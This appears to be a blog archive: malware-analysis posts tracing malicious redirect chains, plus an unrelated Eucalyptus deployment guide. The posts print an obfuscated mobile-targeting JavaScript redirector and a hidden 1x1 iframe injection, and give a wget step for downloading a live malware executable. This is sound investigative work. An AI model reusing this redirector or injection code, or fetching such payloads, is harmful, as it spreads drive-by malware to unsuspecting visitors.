How to handle redirection from malicious websites


The journey starts with a link from the urlquery.net website.

http://urlquery.net/report.php?id=2495895

That report points at a malicious URL: h00p://polycontract[dot]ru/Wallmart.html?go=help

The URL looks like a normal one if you ignore the .ru part 🙂

When I opened it in my browser, it redirected me to

https://www.google.com/search?q=wallmart

So I had to use wget to download the file instead.

After downloading it I opened the saved file in the browser, and got the same redirection again. Grrr..

Let's look at the response headers:

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 16 May 2013 14:26:15 GMT
Content-Type: text/html
Connection: keep-alive
Last-Modified: Thu, 16 May 2013 14:03:59 GMT
ETag: "6bc8011-2e9-4dcd6567d31c0"
Accept-Ranges: bytes
Content-Length: 745

OK, so the site is up (200 OK) and the redirection happens client-side, in the page itself. Since we have the source, let's look at the code that redirects us:

<titl>Wallmart is loading...</title>
<script type="text/javascript"><!--
location.replace("h00p://virgin-altantic[dot]net/news/ask-index.php");//--></script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://virgin-altantic[dot]net/news/ask-index.php"></noscript>

Suspicious. Let's see what VirusTotal says about this website.

https://www.virustotal.com/en/url/b9ae75bcf2d8bc16b2f14b1ca12eafb755ff6d18fb9beb4b3a9f877c8a4b177a/analysis/1368878313/

and

https://www.virustotal.com/en/url/3077275f26bf120619a28734abebf7d321efa8be0c43b6bb0954d5092337a873/analysis/1368878322/

The first of the two is for the URL I started with and the second is for

h00p://polycontract[dot]ru

Every page in the chain redirects, so I have to download everything with wget and analyze it offline: no GUI, only code 😦

Two different analyses; anyway, the good thing is that both still flag it as malicious 🙂

After downloading the second file (ask-index.php) I analysed it and found two JavaScript includes in it.

So I downloaded those two files as well; the references were

<script src="/media/system/js/core.js" type="text/javascript"></script>
<script src="/media/system/js/caption.js" type="text/javascript"></script>

Time to analyze these two files. The VirusTotal reports are

For core.js

https://www.virustotal.com/en/file/6f9229b2551587de22aa693b5da6e5ff350d521825b675a3549d0e09cccd67a1/analysis/1368878881/

For caption.js

https://www.virustotal.com/en/file/66b9077dc4b1c53d1d4bb7e9d3e333a5a3a3aae4b9d01f96b5c8d5c722208e94/analysis/1368878892/

Indeed they are malicious.

Time to take a look inside these two:

document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%53%74%72%69%6E%67%28%33%36%29%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%63%2D%2D%29%72%5B%65%28%63%29%5D%3D%6B%5B%63%5D%7C%7C%65%28%63%29%3B%6B%3D%5B%66%75%6E%63%74%69%6F%6E%28%65%29%7B%72%65%74%75%72%6E%20%72%5B%65%5D%7D%5D%3B%65%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%63%3D%31%7D%3B%77%68%69%6C%65%28%63%2D%2D%29%69%66%28%6B%5B%63%5D%29%70%3D%70%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%65%28%63%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%6B%5B%63%5D%29%3B%72%65%74%75%72%6E%20%70%7D%28%27%37%20%31%3D%38%2E%39%2E%61%28%2F%28%62%29%7C%28%65%29%7C%28%66%29%7C%28%68%29%7C%28%6A%29%7C%28%6B%29%7C%28%6C%29%7C%28%6D%29%7C%28%6E%29%7C%28%6F%29%7C%28%70%29%7C%28%71%29%7C%28%72%29%7C%28%73%29%7C%28%75%2D%29%7C%28%77%29%7C%28%78%29%7C%28%79%29%7C%28%7A%29%7C%28%41%29%7C%28%42%29%7C%28%43%29%7C%28%44%29%7C%28%45%29%7C%28%46%29%7C%28%47%29%7C%28%30%2D%63%29%7C%28%30%2D%64%29%7C%28%30%2D%67%29%7C%28%48%2D%29%7C%28%49%29%7C%28%4A%29%7C%28%32%29%7C%28%4B%29%7C%28%4C%29%7C%28%4D%29%7C%28%4E%2D%29%7C%28%4F%29%7C%28%50%29%7C%28%51%2D%29%7C%28%52%29%7C%28%53%29%7C%28%54%29%7C%28%55%29%7C%28%56%29%7C%28%57%29%7C%28%58%29%7C%28%59%29%7C%28%5A%29%7C%28%31%30%29%7C%28%31%31%29%7C%28%31%32%29%7C%28%31%33%29%7C%28%31%34%29%7C%28%31%35%29%7C%28%31%36%29%7C%28%31%37%29%7C%28%31%38%2D%29%7C%28%31%39%2D%29%7C%28%31%61%29%7C%28%31%62%29%7C%28%31%63%2D%29%7C%28%31%64%29%7C%28%31%65%2D%29%7C%28%31%66%29%7C%28%31%67%29%7C%28%31%68%29%7C%28%31%69%29%7C%28%31%6A%2D%29%7C%28%31%6B%29%7C%28%74%2D%31%6C%29%7C%28%31%6D%29%7C%28%31%6E%2D%29%7C%28%31%6F%29%7C%28%31%70%2D%29%7C%28%31%71%29%7C%28%31%72%29%7C%28%31%73%2D%76%29%7C%28%31%74%29%7C%28%31%75%29%7C%28%33%2D%29%7C%28%31%76%29%7C%28%31%77%29%7C%28%31%78%29%7C%28%31%79%29%7C%28%31%7A%29%7C%28%34%29%7C%28%34%29%7C%28%35%29%7C%28%35%2D%29%7C%28%36%2E%31%41%29%7C%28%36%2E%31%42%29%7C%28%31%43%2E%31%44%29%7C%28%31%45%29%7C%28%31%46%29%7C%28%31%47%29%7C%28%31%48%29%7C%28%32%29%7C%28%33%29%7C%28%31%49%29%7C%28%31%4A%29%7C%28%31%4B%29%7C%28%31%4C%29%7C%28%31%4D%29%7C%28%31%4E%29%7C%28%31%4F%29%7C%28%31%50%2E%31%51%29%7C%28%31%52%29%7C%28%31%53%29%2F%69%29%3B%31%54%28%31%29%7B%31%55%2E%31%56%2E%31%57%3D%22%31%58%22%7D%27%2C%36%32%2C%31%32%32%2C%27%6C%67%7C%69%73%6D%6F%62%69%6C%65%7C%6D%69%64%70%7C%77%61%70%7C%77%69%6E%77%7C%78%64%61%7C%75%70%7C%76%61%72%7C%6E%61%76%69%67%61%74%6F%72%7C%75%73%65%72%41%67%65%6E%74%7C%6D%61%74%63%68%7C%61%63%73%7C%7C%7C%61%6C%61%76%7C%61%6C%63%61%7C%7C%61%6D%6F%69%7C%7C%61%75%64%69%7C%61%73%74%65%7C%61%76%61%6E%7C%62%65%6E%71%7C%62%69%72%64%7C%62%6C%61%63%7C%62%6C%61%7A%7C%62%72%65%77%7C%63%65%6C%6C%7C%63%6C%64%63%7C%7C%63%6D%64%7C%7C%64%61%6E%67%7C%64%6F%63%6F%7C%65%72%69%63%7C%68%69%70%74%7C%69%6E%6E%6F%7C%69%70%61%71%7C%6A%61%76%61%7C%6A%69%67%73%7C%6B%64%64%69%7C%6B%65%6A%69%7C%6C%65%6E%6F%7C%6C%67%65%7C%6D%61%75%69%7C%6D%61%78%6F%7C%6D%69%74%73%7C%6D%6D%65%66%7C%6D%6F%62%69%7C%6D%6F%74%7C%6D%6F%74%6F%7C%6D%77%62%70%7C%6E%65%63%7C%6E%65%77%74%7C%6E%6F%6B%69%7C%6F%70%77%76%7C%70%61%6C%6D%7C%70%61%6E%61%7C%70%61%6E%74%7C%70%64%78%67%7C%70%68%69%6C%7C%70%6C%61%79%7C%70%6C%75%63%7C%70%6F%72%74%7C%70%72%6F%78%7C%71%74%65%6B%7C%71%77%61%70%7C%73%61%67%65%7C%73%61%6D%73%7C%73%61%6E%79%7C%73%63%68%7C%73%65%63%7C%73%65%6E%64%7C%73%65%72%69%7C%73%67%68%7C%73%68%61%72%7C%73%69%65%7C%73%69%65%6D%7C%73%6D%61%6C%7C%73%6D%61%72%7C%73%6F%6E%79%7C%73%70%68%7C%73%79%6D%62%7C%6D%6F%7C%74%65%6C%69%7C%74%69%6D%7C%74%6F%73%68%7C%74%73%6D%7C%75%70%67%31%7C%75%70%73%69%7C%76%6B%7C%76%6F%64%61%7C%77%33%63%73%7C%77%61%70%61%7C%77%61%70%69%7C%77%61%70%70%7C%77%61%70%72%7C%77%65%62%63%7C%62%72%6F%77%73%65%72%7C%6C%69%6E%6B%7C%77%69%6E%64%6F%77%73%7C%63%65%7C%69%65%6D%6F%62%69%6C%65%7C%6D%69%6E%69%7C%6D%6D%70%7C%73%79%6D%62%69%61%6E%7C%70%68%6F%6E%65%7C%70%6F%63%6B%65%74%7C%6D%6F%62%69%6C%65%7C%61%6E%64%72%6F%69%64%7C%70%64%61%7C%50%50%43%7C%53%65%72%69%65%73%36%30%7C%4F%70%65%72%61%7C%4D%69%6E%69%7C%69%70%61%64%7C%69%70%68%6F%6E%65%7C%69%66%7C%64%6F%63%75%6D%65%6E%74%7C%6C%6F%63%61%74%69%6F%6E%7C%68%72%65%66%7C%68%74%74%70%3A%2F%2F%6F%6E%6C%69%6E%65%32%79%6F%75%2E%6F%72%67%2F%73%65%61%72%63%68%2E%70%68%70%3F%73%69%64%3D%31%20%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29%3B%3C%2F%73%63%72%69%70%74%3E%09"));

The malicious code is the same in both files.

After decoding the percent-encoding, this is what I got:

document.write(unescape("<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('7 1=8.9.a(/(b)|(e)|(f)|(h)|(j)|(k)|(l)|(m)|(n)|(o)|(p)|(q)|(r)|(s)|(u-)|(w)|(x)|(y)|(z)|(A)|(B)|(C)|(D)|(E)|(F)|(G)|(0-c)|(0-d)|(0-g)|(H-)|(I)|(J)|(2)|(K)|(L)|(M)|(N-)|(O)|(P)|(Q-)|(R)|(S)|(T)|(U)|(V)|(W)|(X)|(Y)|(Z)|(10)|(11)|(12)|(13)|(14)|(15)|(16)|(17)|(18-)|(19-)|(1a)|(1b)|(1c-)|(1d)|(1e-)|(1f)|(1g)|(1h)|(1i)|(1j-)|(1k)|(t-1l)|(1m)|(1n-)|(1o)|(1p-)|(1q)|(1r)|(1s-v)|(1t)|(1u)|(3-)|(1v)|(1w)|(1x)|(1y)|(1z)|(4)|(4)|(5)|(5-)|(6.1A)|(6.1B)|(1C.1D)|(1E)|(1F)|(1G)|(1H)|(2)|(3)|(1I)|(1J)|(1K)|(1L)|(1M)|(1N)|(1O)|(1P.1Q)|(1R)|(1S)/i);1T(1){1U.1V.1W="1X"}',62,122,'lg|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||amoi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec|newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh|tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemobile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipad|iphone|if|document|location|href|h00p://online2you[dot]org/search.php?sid=1 '.split('|'),0,{}));</script> "));

Unpacking the eval(function(p,a,c,k,e,r){...}) layer shows what it actually does: it matches navigator.userAgent against a long list of mobile browser and handset strings (the variable is literally called "ismobile"), and only when that matches does it set document.location.href. So the final hop fires for mobile visitors only, and it sends them to

h00p://online2you[dot]org/search.php?sid=1
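The packed code above is Dean Edwards' p,a,c,k,e,r: the first argument is the program with every word replaced by a base-62 token, and the fourth is the dictionary the tokens index into. The decoder below is an added example, not code from this post: it undoes both layers (the percent-encoded document.write(unescape(...)) wrapper and the packer) in Python, so nothing is ever eval'ed. It is the general unpacker, not just this one sample. The packed script it runs on is constructed for the demo, with a 14-word dictionary and a placeholder URL instead of the real payload.

```python
"""Decode a document.write(unescape(...)) wrapper and the p,a,c,k,e,r payload inside it.

Added example, not code from the original post. It re-implements the packer's
e() token encoder and dictionary substitution in Python, so the script is
decoded without ever being eval'ed. The packed sample below is constructed:
its 14-word dictionary and URL are placeholders, not the page's payload.
"""
import re
from urllib.parse import quote, unquote

# Constructed inner script (same shape as the page's caption.js after
# percent-decoding, but with a made-up dictionary and a placeholder URL).
_INNER = (
    '<script type="text/javascript">eval(function(p,a,c,k,e,r){/* packer body */}'
    "('0 1=2.3.4(/5|6|7/8);9(1){a.b.c=\"d\"}',62,14,"
    "'var|ua|navigator|userAgent|match|android|iphone|ipad|i|if|document|"
    "location|href|http://example.invalid/search.php?sid=1'.split('|'),0,{}))"
    "</script>"
)
# The same script wrapped the way core.js/caption.js delivered it.
SAMPLE_JS = 'document.write(unescape("%s"));' % quote(_INNER, safe="")

_B36 = "0123456789abcdefghijklmnopqrstuvwxyz"

# Matches the trailing call: }('<p>',<a>,<c>,'<k>'.split('|'),0,{})
PACKER_CALL = re.compile(
    r"\}\('(?P<p>.*?)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*'(?P<k>.*?)'\.split\('\|'\)",
    re.S,
)


def js_unescape(s: str) -> str:
    """Emulate JavaScript unescape(): %uXXXX and %XX are one code unit each."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def encode_token(c: int, a: int) -> str:
    """The packer's e(c): c written in base a, digits 0-9a-z then A-Z for 36..61."""
    prefix = encode_token(c // a, a) if c >= a else ""
    d = c % a
    return prefix + (chr(d + 29) if d > 35 else _B36[d])


def unpack(p: str, a: int, c: int, k: list) -> str:
    """Replace every word token in p with its dictionary entry (empty entries stay)."""
    table = {encode_token(i, a): k[i] for i in range(min(c, len(k))) if k[i]}
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)


def decode_script(line: str):
    """Return (unpacked code, redirect URL or None) for a document.write(unescape()) line."""
    m = re.search(r'unescape\("([^"]*)"\)', line)
    inner = js_unescape(m.group(1)) if m else line
    call = PACKER_CALL.search(inner)
    if call is None:
        raise ValueError("no p,a,c,k,e,r call found")
    p = call["p"].replace("\\'", "'").replace("\\\\", "\\")  # undo JS string escapes
    code = unpack(p, int(call["a"]), int(call["c"]), call["k"].split("|"))
    url = re.search(r'location\.(?:href\s*=\s*|replace\()["\']([^"\']+)["\']', code)
    return code, (url.group(1) if url else None)


if __name__ == "__main__":
    code, url = decode_script(SAMPLE_JS)
    print(code)
    print("redirects to:", url)
```

On the page's own payload the same routine yields the ismobile check and the online2you URL, because 1T, 1U, 1V, 1W, 1X are simply indices 117 to 121 (base 62) into the 122-word dictionary, whose last five entries are if, document, location, href and the URL.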

The next task was to get the payload, as this was most probably the site hosting it.

Unfortunately it returned a 404:

h00p://online2you[dot]org/search.php?sid=1
Resolving online2you.org... 67.215.66.132
Connecting to online2you.org|67.215.66.132|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2013-05-18 17:44:43 ERROR 404: Not Found.

Since there was redirection everywhere, I thought the 404 might depend on geographic location, so I tried it through proxies in the US, Russia and three or four other countries, but got the same result every time.

Is it just me, or is everyone unable to download the content from this site?

OK, let's look at the whois for the website.

whois for polycontract[dot]ru

domain:        POLYCONTRACT.RU
nserver:       ns1.hosting.reg.ru.
nserver:       ns2.hosting.reg.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
org:           PoliKontrakt, LLC
registrar:     REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created:       2011.01.18
paid-till:     2014.01.18
free-date:     2014.02.18
source:        TCI

urlquery report for online2you: http://urlquery.net/report.php?id=1747064

whois for online2you[dot]org

Domain ID:D168159997-LROR
Domain Name:ONLINE2YOU.ORG
Created On:14-Mar-2013 22:36:14 UTC
Last Updated On:14-May-2013 03:45:15 UTC
Expiration Date:14-Mar-2014 22:36:14 UTC
Sponsoring Registrar:Bizcn.com, Inc. (R1248-LROR)
Status:OK Registrant ID:orgph63300498572
Registrant Name:Whois Agent
Registrant Organization:Whois Privacy Protection Service
status: ACTIVE
 remarks: Registration information: http://www.pir.org

And finally a snapshot of all the files I gathered:

(screenshot: the files gathered during this analysis, 2013-05-18)

That was my journey, and this is where it ended.

Your input and criticism are welcome.

#MalwareMustDie


Eucalyptus Deployment


 

Most important thing: enable virtualization (Intel VT-x) in the BIOS, otherwise nothing is going to work (this is what I forgot to do).

The version of Eucalyptus I used is 3.2 (FastStart), and you can download it from

http://www.eucalyptus.com/download/faststart

It ships Eucalyptus on top of CentOS and can be installed on one node or on multiple nodes.

A single-node installation is comparatively easy and fast, so I am only discussing the two-node installation.

 

Hardware I got:

2 servers, both identical:

quad-core Intel Xeon processor

4 GB RAM

1 TB hard disk

2 network cards

1st machine specification

Name of node: MyCloudPortalNode

IP: eth0: 10.20.0.51 (public)

eth1: 10.0.0.1 (private)

1) Start the system, press F2 and get into the BIOS.

2) In the Advanced menu, enable virtualization (it was disabled). Press F10 to save.

3) On restart press F6 and choose the boot-from-CD option.

4) Insert the Eucalyptus DVD and, when it prompts for the installation options, choose the node server installation.

5) When it prompts for the network IPs, enter the values given above.

6) It creates the br0 bridge by itself.

7) Set up the NTP server:

yum install ntp

chkconfig ntpd on

service ntpd start

then check the date with

date

 

Leave this machine as it is and move on to the installation of the front-end controller.

 

2nd machine

Name of node: MyCloudPortalFront

IP: eth0: 10.2.0.52

eth1: 10.0.0.2

 

1) Start the system, press F2 and get into the BIOS.

2) In the Advanced menu, enable virtualization (it was disabled). Press F10 to save.

3) On restart press F6 and choose the boot-from-CD option.

4) Insert the Eucalyptus DVD and, when it prompts for the installation options, choose "install front end".

5) Choose the IPs already defined above and start it.

6) When it starts, it asks for the public and private IP.

Don't change the private IP; for the public IP, give the IP range from which the VMs will get their addresses when they come up.

7) Set all of this accordingly and then start the machine.

On the restart after installation it asks for the IP of the node; enter the node IP, then it prompts for the node's root password, enter it and the node is registered 🙂

8) Set up the NTP server:

yum install ntp

chkconfig ntpd on

service ntpd start

 

Then check the date.

Now the steps common to both machines.

Stop all the Eucalyptus services.

On the front end:

service eucalyptus-cloud stop

service eucalyptus-cc stop

On the NC:

service eucalyptus-nc stop

 

Test with euca-describe-availability-zones verbose.

The output should look like this; I already had two m1.small VMs running, so it shows 2 free out of 4:

euca-describe-availability-zones verbose
AVAILABILITYZONE CLUSTER01 10.0.0.2 arn:euca:eucalyptus:CLUSTER01:cluster:cc_01/
AVAILABILITYZONE |- vm types    free / max   cpu   ram    disk
AVAILABILITYZONE |- m1.small    0002 / 0004   1     512    5
AVAILABILITYZONE |- c1.medium   0001 / 0002   2     512    10
AVAILABILITYZONE |- m1.large    0001 / 0002   2     1024   15
AVAILABILITYZONE |- m1.xlarge   0001 / 0002   2     2048   20
AVAILABILITYZONE |- c1.xlarge   0000 / 0001   4     4096   20

This shows how many VMs of each type you can still create and the other available resources.

 

Now start all three services and point your browser to:

https://<frontendip>:8888 : the user console (dashboard), for creating VMs

https://<frontendip>:8443 : the admin console, for profile editing

Now go and play with VMs 🙂

After creating a VM, this is how it looks when the VM is created and running. The green tick mark differs for different kinds of things.

(screenshot: a created, running VM)

Do comment with your views, any errors, or questions.

I love Comments 😉

Handling error 402: Payment Required with malicious domain #MMD


Link from where I started:

http://urlquery.net/report.php?id=1858750

And this report led me here:

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar

It responded with 402 Payment Required:

Request URL:h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/vSdOqASe.jar
Request Method:GET
Status Code:402 Payment Required
Response Header
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:0
Content-Type:text/html; charset=utf-8
Date:Mon, 08 Apr 2013 13:16:25 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

Suspicious, isn't it? A 402 Payment Required on a .jar is unusual in itself, and the header set is telling too: nginx/0.7.64 advertising both ASP.NET and HPHP is an inconsistent combination, and exactly the same Server/X-Powered-By set shows up later on the 1peregon.3d-game[dot]com landing pages.

So I proceeded by walking up to the parent directory on the server, which gave me the link

h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL

which automatically led to a blank webpage.

Response for h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/pdfx.html

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Length:817
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:50 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

Response for “h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/zmiohek.html”

Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:1676
Content-Type:text/html;charset=utf-8
Date:Mon, 08 Apr 2013 15:49:51 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

 

When I analysed its source I found a variable storing a web address:

<script>
var icEVKt;
var Owsfe;CvkiFV='RHaLS';if (CvkiFV=='Yiwvd') vPUR='CnYEdy';
var XXwVKa="h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32";
</script>

Now use

wget --save-headers -d 'h00p://xfecajsmipichbex[dot]in/dkCSD30yLXI0ANWV0N3ab0JYAK0i1gr0xpz10m3aM0kkMd0odNL0RERP17ZDG16mRL0N8KM0XG9d0S0XG0GzNV05JZ10HrMA02rUm0AUgY0kQdn11pUL0qQQt0DZQ012fm611kpG0FebV0oNUn08f3o0gxYY0MaW413LKv03FP40Er9118am10Jld80lyyk11HiD0gmv2/TL7vbliVHL.exe?IUABFhcBXOgtL0ce=m&h=32'

-d turns on debug output and --save-headers writes the response headers into the saved file. The URL is quoted because of the & in the query string, which the shell would otherwise treat as a background operator and drop the rest of the URL.

Or

Simply paste this in your browser to download the exe 😉

This is the VirusTotal analysis report for the file; it says 8/45:

https://www.virustotal.com/en/file/cb92c51ba26391eae67d85b968b61a71e33cea4a82894f10fa6777ae9938e7e8/analysis/

Anubis report for this exe:

http://anubis.iseclab.org/?action=result&task_id=1956ca7159064b544fd05dd3c6c72cd5e&format=pdf

dig output:

dig XFECAJSMIPICHBEX.IN ANY
; <<>> DiG 9.8.3-P1 <<>> XFECAJSMIPICHBEX.IN ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5853
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;XFECAJSMIPICHBEX.IN. IN ANY
;; ANSWER SECTION:
XFECAJSMIPICHBEX.IN. 28800 IN A 192.210.150.43
XFECAJSMIPICHBEX.IN. 7200 IN SOA erdomain.mercury.orderbox-dns.com. founderapi.email.com. 2013040403 7200 7200 172800 38400
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mars.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.venus.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.mercury.orderbox-dns.com.
XFECAJSMIPICHBEX.IN. 38400 IN NS erdomain.earth.orderbox-dns.com.
;; Query time: 401 msec
;; SERVER: 192.168.1.1#53(192.168.1.1)
;; WHEN: Tue Apr 9 11:42:38 2013
;; MSG SIZE rcvd: 239

 

whois xfecajsmipichbex.in
Domain ID:D7196301-AFIN
Domain Name:XFECAJSMIPICHBEX.IN
Created On:04-Apr-2013 21:46:01 UTC
Last Updated On:04-Apr-2013 21:46:03 UTC
Expiration Date:04-Apr-2014 21:46:01 UTC
Sponsoring Registrar:Webiq Domains Solutions Pvt. Ltd. (R131-AFIN)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Status:ADDPERIOD
Registrant ID:WIQ_27213783
Registrant Name:founder api
Registrant Organization:N/A
Registrant Street1:foundap 4
Registrant City:new york
Registrant State/Province:New York
Registrant Postal Code:10006
Registrant Country:US
Registrant Phone:+1.5274563219
Registrant Email:founderapi@email.com

VirusTotal report for the domains hosted on the same IP:
https://www.virustotal.com/en/ip-address/192.210.150.43/information/

 

If you check the whois of every domain there, you will find the same registrant details, such as the phone number.

 

(screenshot: h00p://192.210.150.43/)

(screenshot: geographical IP locator)

According to the Wepawet report (http://wepawet.iseclab.org/view.php?hash=453609c244e3925ce0fe662a71eba0a8&t=1365501256&type=js) the code references 2 PDFs, but I was able to download only 1 of the 2.

 

PDF downloaded: TLfeaOwS.pdf

The headers for the page "h00p://xfecajsmipichbex[dot]in/s5c1fN0XuiI0WhDF0sxHb0Xavz0a4mO0bg7N0NyYL/TLfeaOwS.pdf" are listed after the PDF data.

PDF data as shown in the browser:

 

%PDF-1.6 %�•� 18 0 obj <> endobj 6 0 obj <> endobj 22 0 obj <> endobj 8 0 obj <> stream 1.6511*pdf Piexnlaypa

endstream endobj 20 0 obj <> endobj 23 0 obj <> endobj 5 0 obj <> endobj 1 0 obj <> endobj 21 0 obj <> endobj 7 0 obj <> /XObject <<>>>> endobj 19 0 obj <> endobj xref 0 24 trailer <> startxref 802 %%EOF
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Encoding:gzip
Content-Length:5531
Content-Type:text/html;charset=utf-8
Date:Tue, 09 Apr 2013 13:17:17 GMT
Expires:Thu, 19 Nov 1981 08:52:00 GMT
Pragma:no-cache
Server:nginx/0.7.64
X-Mode:HTML
X-Powered-By:ASP.NET version 4
X-Powered-By:HPHP

VirusTotal report for the PDF file (note that the server labelled it text/html, which is why the browser rendered the raw PDF objects as text):

https://www.virustotal.com/en/file/e0be674422a6579361b0724da99eee4c9b33e137239a7268c530f1afea0c1b3d/analysis/1366874391/

which confirms it as malicious.

(screenshot: all the files, 2013-04-25)

Every time you download the file, the server gives it a different random name.

 

#MalwareMustDie

Malicious robaina91.com analysis #MMD


We got the information about the bad guy from this link (http://urlquery.net/report.php?id=1906732),

which finally leads us to this website: h00p://www.robaina91[dot]com/es/robaina-album.html

It looks like a normal site, but it is not (Google Chrome had already warned me that the site is malicious).

Let's look at the response headers:

Accept-Ranges:bytes
Connection:close
Content-Length:30270
Content-Type:text/html
Date:Wed, 10 Apr 2013 10:45:33 GMT
ETag:"5e18278-763e-51f1a980"
Last-Modified:Fri, 01 Feb 2013 20:09:26 GMT
Server:Apache/2.2.3 (CentOS)

Looks normal, and indeed the headers are; let's dig a little more 🙂

A little analysis of the page source turned up a hidden 1x1 iframe:

<iframe src="h00p://allbestauto042[dot]ru/in.cgi?ftp" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;">

 

OK, let's analyse this link: h00p://allbestauto042[dot]ru/in.cgi?ftp

The headers say:

Request URL:h00p://allbestauto042[dot]ru/in.cgi?ftp
Request Method:GET
Status Code:302 Found

Query string parameter: ftp (no value)

Response headers:

Connection:close
Content-Type:text/html; charset=UTF-8
Date:Thu, 11 Apr 2013 06:08:31 GMT
Location:http://google.com
Server:Apache/2.2.15 (CentOS)
Set-Cookie:vbpnxftp=_1_10000_; expires=Fri, 12-Apr-2013 06:08:31 GMT; path=/;domain=allbestauto042.ru
Set-Cookie:TSUSER=ftp; expires=Fri, 11-Apr-2014 06:08:31 GMT;path=/;domain=allbestauto042.ru
Transfer-Encoding:chunked

 

Why a 302, why is it redirecting, and why does it not actually show Google? IDK, please do tell me, as I have no idea, but this looks suspicious.
